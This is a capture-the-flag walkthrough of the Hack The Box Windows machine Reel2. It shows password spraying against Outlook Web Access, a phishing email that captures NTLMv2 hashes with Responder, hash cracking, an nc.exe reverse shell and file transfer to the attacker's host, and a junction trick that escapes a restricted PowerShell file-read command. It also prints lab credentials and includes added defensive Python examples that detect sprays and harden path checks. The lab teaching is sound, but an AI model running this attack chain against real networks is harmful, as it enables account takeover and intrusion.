Hack-The-Box-walkthrough[reel2]

Introduction

OS: Windows
Difficulty: Hard
Points: 40
Release: 03 Oct 2020
IP: 10.10.10.210

User Blood xct 00 days, 03 hours, 08 mins, 20 seconds.
Root Blood xct 00 days, 07 hours, 06 mins, 12 seconds.


information gathering

First, run nmap as usual.

root@kali:~/hackthebox/machine/reel2# nmap -sV -v -p- --min-rate=10000 10.10.10.210
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
443/tcp open ssl/https?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
6008/tcp open msrpc Microsoft Windows RPC
6010/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6011/tcp open msrpc Microsoft Windows RPC
6012/tcp open msrpc Microsoft Windows RPC
6027/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • Port-80

Enumerating HTTP on port 80 only returns 403 Forbidden.

Enumerating HTTPS.

Use gobuster to find directories.

root@kali:~/hackthebox/machine/reel2# gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.210
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/12 22:34:11 Starting gobuster
===============================================================
/public (Status: 302)
/exchange (Status: 302)
/Public (Status: 302)
/rpc (Status: 401)
/owa (Status: 301)

Go to /owa first.

It is a login page. I tried some SQL injection, but nothing worked.

  • Port-8080

Create an account on the sign-up page.

lucifer11/123456Wx

The home page lists many users.

Gather all the usernames into a user.txt.

sven
svensson
s.svensson

Read all the posts in the Posts tab; the post by the svensson user gives us a hint: This summer is so hot!

Create a pass.txt from this hint.

root@kali:~/hackthebox/machine/reel2# cat /usr/share/wordlists/rockyou.txt | grep Summer > pass.txt
root@kali:~/hackthebox/machine/reel2# cat pass.txt
Summer
Summer1
Summer07
Summer08
...

With user.txt and pass.txt, let's brute-force the OWA login.

We don't brute-force the OWA login with wfuzz or hydra here; instead we need to install a tool called SprayingToolkit.

  • SprayingToolkit

Before running this tool, install its requirements.

Let's run the tool.

root@kali:~/SprayingToolkit# python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
[*] Starting spray at 2020-10-13 03:40:56 UTC
[-] Authentication failed: svensson:Summer2020 (Invalid credentials)
[-] Authentication failed: sven:Summer2020 (Invalid credentials)
[+] Found credentials: s.svensson:Summer2020 (Invalid credentials)
  • Username = s.svensson
  • Password = Summer2020
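The spray above is exactly the pattern a mail-server defender should be alerting on: one source, one password, many accounts, few attempts per account. The following Python is an added example (not from the walkthrough and not part of SprayingToolkit) that runs that detection over a few constructed authentication log lines; the log format, the `detect_spray` and `successes_after_spray` names and the thresholds are this example's own assumptions, so map the regex to your own OWA, IIS or proxy log layout.

```python
"""Password-spray detector over authentication log lines.

Added example (not from the original walkthrough or from SprayingToolkit).
The log format below is constructed for this example; adapt LINE_RE to
your own OWA/IIS or proxy log layout.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines: one source tries the same password across
# many accounts (a spray), while another source is a single user's typos.
SAMPLE_LOG = """\
2020-10-13T03:40:56Z src=10.10.14.3 user=svensson result=FAIL
2020-10-13T03:40:57Z src=10.10.14.3 user=sven result=FAIL
2020-10-13T03:40:58Z src=10.10.14.3 user=s.svensson result=OK
2020-10-13T03:41:00Z src=10.10.14.3 user=k.svensson result=FAIL
2020-10-13T03:41:01Z src=10.10.14.3 user=administrator result=FAIL
2020-10-13T03:45:10Z src=10.10.20.7 user=j.doe result=FAIL
2020-10-13T03:45:20Z src=10.10.20.7 user=j.doe result=FAIL
2020-10-13T03:45:40Z src=10.10.20.7 user=j.doe result=OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse_lines(text):
    """Yield (timestamp, src, user, result) tuples; skip malformed lines."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["src"], m["user"], m["result"]


def detect_spray(text, window=timedelta(minutes=10), min_users=4):
    """Return {src: sorted distinct users} for every source that tried at
    least `min_users` distinct accounts within `window`.

    A spray is few attempts per account across many accounts, so the
    distinct-user count per source, not the failure count, is the signal;
    a lockout-based alert would never fire on it."""
    events = defaultdict(list)
    for ts, src, user, _ in parse_lines(text):
        events[src].append((ts, user))
    findings = {}
    for src, evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            users = {u for t, u in evs[i:] if t - start <= window}
            if len(users) >= min_users:
                findings[src] = sorted(users)
                break
    return findings


def successes_after_spray(text, findings):
    """Accounts that logged in successfully from a spraying source; these
    are the ones to reset and investigate first."""
    hits = set()
    for _, src, user, result in parse_lines(text):
        if src in findings and result == "OK":
            hits.add((src, user))
    return sorted(hits)


if __name__ == "__main__":
    found = detect_spray(SAMPLE_LOG)
    for src, users in found.items():
        print(f"spray from {src}: {len(users)} accounts -> {users}")
    for src, user in successes_after_spray(SAMPLE_LOG, found):
        print(f"successful login during spray: {user} from {src}")
```

Run against the constructed sample it flags 10.10.14.3 (five accounts inside a minute) and reports s.svensson as the account that accepted the sprayed password, while the single user retrying their own password from 10.10.20.7 stays below the threshold.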

get shell

The site is in another language. Let's open it in Chromium so we can understand what is going on.

Now I understand what's going on here: it's a mail server, so I think we need to do some phishing.

If you don't know about that, here is an interesting article.

  • NetNTLMv2 hash stealing using Outlook

So what we do now is compose a new message:

1. Click on New message.

2. Select all users with Ctrl+A, then click the To button at the bottom, so the email goes to each and every user.

3. Give any subject you like and in the body enter your HTB IP, e.g. http://10.10.14.3

  • Important:

Before sending this email, start Responder.

responder -I tun0

Boom, after a couple of minutes we get the response back.

Now we need to crack this hash with hashcat; we know it is an NTLMv2 hash.

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
  • username = k.svensson

  • password = kittycat1

Evil-WinRM does not work in this situation because port 5985 is not open.

So we use PowerShell on Linux to log in. But first, install PowerShell for Linux:

apt install gss-ntlmssp
apt-get install powershell

After installation you can start PowerShell with pwsh.

Now log in with pwsh.

root@kali:~# pwsh
PowerShell 7.0.0
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/powershell
Type 'help' to get help.

A new PowerShell stable release is available: v7.0.3
Upgrade now, or check out the release page at:
https://aka.ms/PowerShell-Release?tag=v7.0.3

PS /root> $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson

PowerShell credential request
Enter your credentials.
Password for user k.svensson: *********

PS /root> Enter-PSSession $offsec_session
[10.10.10.210]: P>

Now commands like dir, ls, cd and whoami won't work.

$env:username and $env:domainname do work.

[10.10.10.210]: P> $env:username
k.svensson

We need to execute PowerShell commands inside a script block.

  • behavior of Out-Default
[10.10.10.210]: P> &{ cd ../Desktop }
[10.10.10.210]: P> &{ ls }


Directory: C:\Users\k.svensson\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2020/7/30 13:19 2428 Sticky Notes.lnk
-ar--- 2020/10/13 9:17 34 user.txt


[10.10.10.210]: P> &{ type user.txt} 210ff91b4373ae60dbc352737555b4b4

get root

Now let's turn this restricted session into a proper shell; for that we transfer an nc.exe binary and get a reverse shell.

  1. Open a simple HTTP server.
root@kali:~/hackthebox/machine/reel2# ls
nc.exe pass.txt user.txt
root@kali:~/hackthebox/machine/reel2# python -m SimpleHTTPServer 80
  2. Transfer nc.exe to the system.
  • After running that, open a netcat listener.
[10.10.10.210]: PS> &{ iwr -uri http://10.10.14.3/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
[10.10.10.210]: PS> &{ cd 'C:\Windows\System32\spool\drivers\color\'}
[10.10.10.210]: PS> &{ ./nc.exe 10.10.14.3 9001 -e powershell.exe}

And we get a reverse shell.

root@kali:~# nc -lvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.210.
Ncat: Connection from 10.10.10.210:57417.
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\System32\spool\drivers\color> whoami
whoami
htb\k.svensson

We found nothing in our enumeration process. Let's check the logs for anything interesting.

PS C:\> dir
dir


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/30/2020 12:15 PM ExchangeSetupLogs
d----- 7/30/2020 12:02 PM inetpub
d----- 8/22/2013 5:52 PM PerfLogs
d-r--- 10/8/2020 3:29 PM Program Files
d----- 7/30/2020 11:48 AM Program Files (x86)
d-r--- 7/30/2020 1:17 PM Users
d----- 9/29/2020 6:09 PM Windows
d----- 7/28/2020 2:57 PM xampp

We find a 000003.log file under our user's profile directory. Let's look at that.

PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> ls
ls


Directory: C:\Users\k.svensson\AppData\Roaming\stickynotes\Local
Storage\leveldb


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/8/2020 3:34 PM 2320 000003.log
-a---- 7/30/2020 1:19 PM 16 CURRENT
-a---- 7/30/2020 1:19 PM 0 LOCK
-a---- 10/13/2020 9:22 AM 0 LOG
-a---- 10/8/2020 3:34 PM 182 LOG.old
-a---- 7/30/2020 1:19 PM 41 MANIFEST-000001

When we use the type command on 000003.log it only shows gibberish.

So we need to get the file onto our local machine.

We use nc.exe to transfer it.

  1. Open a listener on your local machine to receive the file content.
nc -nvlp 1234 > 000003.log
  2. In the Windows reverse shell, drop into cmd (PowerShell does not support the < input redirection that nc.exe needs here) and run this command.
PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> cd /
cd /
PS C:\> cmd

cmd
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\>cd "C:\Windows\System32\spool\drivers\color\"
cd "C:\Windows\System32\spool\drivers\color\"

C:\Windows\System32\spool\drivers\color>nc.exe 10.10.14.3 1234 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"
nc.exe 10.10.14.3 1234 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"

Let’s check our netcat listener.

root@kali:~/hackthebox/machine/reel2# nc -nvlp 1234 > 000003.log
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.210.
Ncat: Connection from 10.10.10.210:51827.

Use the strings command to see the content of 000003.log.

root@kali:~/hackthebox/machine/reel2# strings 000003.log 
VERSION
META:app://.
_app://.
__storejs__test__Z
META:app://.
_app://.
{"first":"<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>","back":"rgb(255, 242, 171)","title":"rgb(255, 235, 129)","wid":"350","hei":"375","deleted":"no","closed":"yes","locked":"no"}
_app://.
__storejs__test__
_app://.
closed
{"closed":"yes"}
_app://.
{"ids":"1"}y
META:app://.
_app://.
__storejs__test__
_app://.
closed
@:lK
META:app://.
_app://.
closed
{"closed":"yes"}
META:app://.
_app://.
__storejs__test__
_app://.
closed
META:app://.
_app://.
closed
{"closed":"yes"}
META:app://.
_app://.
__storejs__test__
_app://.
closed
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__P
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__]
META:app://.
_app://.
closed
{"closed":"yes"}
META:app://.
_app://.
__storejs__test__
_app://.
closed:
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__b
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__N
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__
META:app://.
_app://.
__storejs__test__

Now we have the username and password:

username = jea_test_account
password = Ab!Q@vcg^%@#1
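Reading the note out of the raw LevelDB log with `strings` works, but the JSON records can be pulled out directly and screened for anything credential-shaped, which is also how you would sweep a user profile for plaintext secrets during an investigation or a pre-incident hygiene check. The Python below is an added example, not from the walkthrough: it uses a constructed byte string in place of the real 000003.log (the secret in it is a made-up placeholder), and `extract_json_objects` and `find_credential_notes` are names chosen here.

```python
"""Pull sticky-note JSON records out of a raw LevelDB .log file and flag
notes that look like they hold credentials.

Added example; not part of the original walkthrough. LevelDB log files
are binary, but the values the Sticky Notes app stores are JSON strings,
so a balanced-brace scan over the bytes recovers them without a LevelDB
library. The sample bytes below are constructed for this example.
"""
import json
import re
import sys

# Constructed stand-in for a leveldb 000003.log: binary record framing
# around JSON values, the same shape `strings` showed in the walkthrough.
SAMPLE_LOG = (
    b"\x00\x01\x02VERSION\x00META:app://.\x00_app://.\x00__storejs__test__\x00"
    b'{"first":"<p>Credentials for JEA</p><p>svc_example:P@ssw0rd-constructed</p>",'
    b'"back":"rgb(255, 242, 171)","deleted":"no","closed":"yes"}\x00'
    b"_app://.\x00closed\x00"
    b'{"closed":"yes"}\x00_app://.\x00{"ids":"1"}y\x00'
    b'{"first":"<p>Shopping list</p>","deleted":"no"}\x00'
)

# user:password pairs written as one token, plus common credential words.
CRED_TOKEN_RE = re.compile(r"\b[\w.\-]+:[^\s<>\"']{6,}")
CRED_WORDS = ("password", "passwd", "credential", "secret", "token")


def extract_json_objects(data):
    """Return every top-level {...} span in `data` that parses as JSON.
    Braces inside JSON strings are tracked so HTML such as <p>{x}</p>
    inside a note does not split a record."""
    text = data.decode("latin-1")  # byte-preserving; JSON here is ASCII
    objects, i = [], 0
    while i < len(text):
        if text[i] != "{":
            i += 1
            continue
        depth, in_str, esc, j = 0, False, False, i
        while j < len(text):
            ch = text[j]
            if in_str:
                if esc:
                    esc = False
                elif ch == "\\":
                    esc = True
                elif ch == '"':
                    in_str = False
            elif ch == '"':
                in_str = True
            elif ch == "{":
                depth += 1
            elif ch == "}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        candidate = text[i:j + 1]
        try:
            objects.append(json.loads(candidate))
            i = j + 1
        except ValueError:
            i += 1  # not JSON (binary noise); keep scanning from next byte
    return objects


def strip_html(s):
    """Sticky Notes stores the note body as HTML; drop the tags."""
    return re.sub(r"<[^>]+>", " ", s)


def find_credential_notes(data):
    """Return (note_text, [user:pass tokens]) for sticky notes whose body
    mentions credentials or contains a user:password-looking token."""
    findings = []
    for obj in extract_json_objects(data):
        body = obj.get("first")
        if not isinstance(body, str):
            continue  # bookkeeping records such as {"closed":"yes"}
        plain = strip_html(body)
        tokens = CRED_TOKEN_RE.findall(plain)
        if tokens or any(w in plain.lower() for w in CRED_WORDS):
            findings.append((plain.strip(), tokens))
    return findings


if __name__ == "__main__":
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for note, tokens in find_credential_notes(raw):
        print(f"note: {note!r}\n  tokens: {tokens}")
```

Pass a real `000003.log` path as the first argument to scan it; the brace scanner is deliberately tolerant of the binary framing, so anything that fails to parse is simply skipped rather than aborting the sweep.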

Privilege escalation

Looking at the jea_test_account.psrc and .pssc files, the Check-File command only reads a file if its path is under "C:\ProgramData".

So we create a symlink (a junction) inside the ProgramData directory that points to the Administrator directory.

  • Important:

Be sure to run this command in PS (the PowerShell reverse shell).

PS C:\> New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'


Directory: C:\ProgramData


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----l 10/13/2020 11:02 AM root

Now the command executes successfully.

So when we log in as jea_test_account we can also reach the Administrator directory through the junction.

Now we need to log in as jea_test_account. Open a new terminal and type pwsh.

  • Run the commands one by one.
root@kali:~# pwsh
PowerShell 7.0.0
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/powershell
Type 'help' to get help.

A new PowerShell stable release is available: v7.0.3
Upgrade now, or check out the release page at:
https://aka.ms/PowerShell-Release?tag=v7.0.3

PS /root> $username = "jea_test_account"
PS /root> $password = ConvertTo-SecureString "Ab!Q@vcg^%@#1" -AsPlainText -Force
PS /root> $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)
PS /root> Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate
[10.10.10.210]: PS>Check-File C:\programdata\root\Desktop\root.txt
18c458e91c1f45379bc97905034c8ad8
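The root step works because Check-File only compares the path text against C:\ProgramData and never resolves the junction, and because ProgramData is writable by ordinary users, so they can create that junction. The following Python is an added example (not the machine's JEA configuration and not the author's code) that shows the weak prefix check beside a hardened version that resolves links before comparing. It builds a throwaway directory layout and uses a POSIX symlink to stand in for the Windows junction; `weak_check`, `strong_check`, `read_confined` and `build_demo` are names chosen here.

```python
"""Why a prefix check on the path is not enough: a junction (a symlink
here) inside the allowed directory can point anywhere on disk.

Added example, not from the walkthrough or from the machine's JEA
configuration. It builds a throwaway layout in a temp directory and
uses a POSIX symlink to stand in for the Windows junction; the function
names are this example's own.
"""
import os
import tempfile


def weak_check(path, allowed_root):
    """The pattern the walkthrough abuses: accept any path whose text
    starts with the allowed root. Both a junction inside the root and a
    '..' component defeat it, because nothing is resolved."""
    return path.startswith(allowed_root)


def strong_check(path, allowed_root):
    """Resolve every link and '..' component before comparing, then
    require the resolved path to be the root itself or a descendant."""
    real_root = os.path.realpath(allowed_root)
    real_path = os.path.realpath(path)
    try:
        return os.path.commonpath([real_root, real_path]) == real_root
    except ValueError:  # different drives on Windows: cannot be inside
        return False


def read_confined(path, allowed_root):
    """Read-file helper in the spirit of Check-File, gated by strong_check.
    Raises PermissionError instead of returning the contents."""
    if not strong_check(path, allowed_root):
        raise PermissionError(f"{path} escapes {allowed_root}")
    with open(path) as f:
        return f.read()


def build_demo():
    """Lay out ProgramData/, Administrator/root.txt and the junction
    ProgramData/root -> Administrator; return (allowed_root, probes)."""
    base = tempfile.mkdtemp()
    program_data = os.path.join(base, "ProgramData")
    admin = os.path.join(base, "Administrator")
    os.makedirs(program_data)
    os.makedirs(admin)
    with open(os.path.join(admin, "root.txt"), "w") as f:
        f.write("flag-placeholder\n")  # constructed stand-in for root.txt
    with open(os.path.join(program_data, "notes.txt"), "w") as f:
        f.write("harmless\n")
    # The junction from the walkthrough, as a symlink on POSIX.
    os.symlink(admin, os.path.join(program_data, "root"))
    probes = {
        "legit": os.path.join(program_data, "notes.txt"),
        "via_link": os.path.join(program_data, "root", "root.txt"),
        "dotdot": os.path.join(program_data, "..", "Administrator", "root.txt"),
    }
    return program_data, probes


def compare_checks():
    """Return {probe: (weak_result, strong_result)} for the demo layout."""
    root, probes = build_demo()
    return {name: (weak_check(p, root), strong_check(p, root))
            for name, p in probes.items()}


if __name__ == "__main__":
    for name, (weak, strong) in compare_checks().items():
        print(f"{name:9s} weak={weak!s:5s} strong={strong}")
```

The weak check passes all three probes; the strong one passes only the file that really lives under the allowed root. The same fix applies inside a JEA function: resolve the target before reading (or refuse anything carrying the ReparsePoint attribute), and do not pick an allowed root that the calling users can write to, since that is what let the junction be created in the first place.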

Summary of knowledge

  • brute-force the OWA login using SprayingToolkit
  • NetNTLMv2 hash stealing using Outlook
  • Responder to capture the NTLMv2 hash
  • hashcat to crack the NTLMv2 hash
  • log in with pwsh
  • execute PowerShell commands inside a script block
  • iwr to download files
  • nc.exe to transfer the file
  • create a symlink (junction) from ProgramData to the Administrator directory, then use Check-File to read the root flag.

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…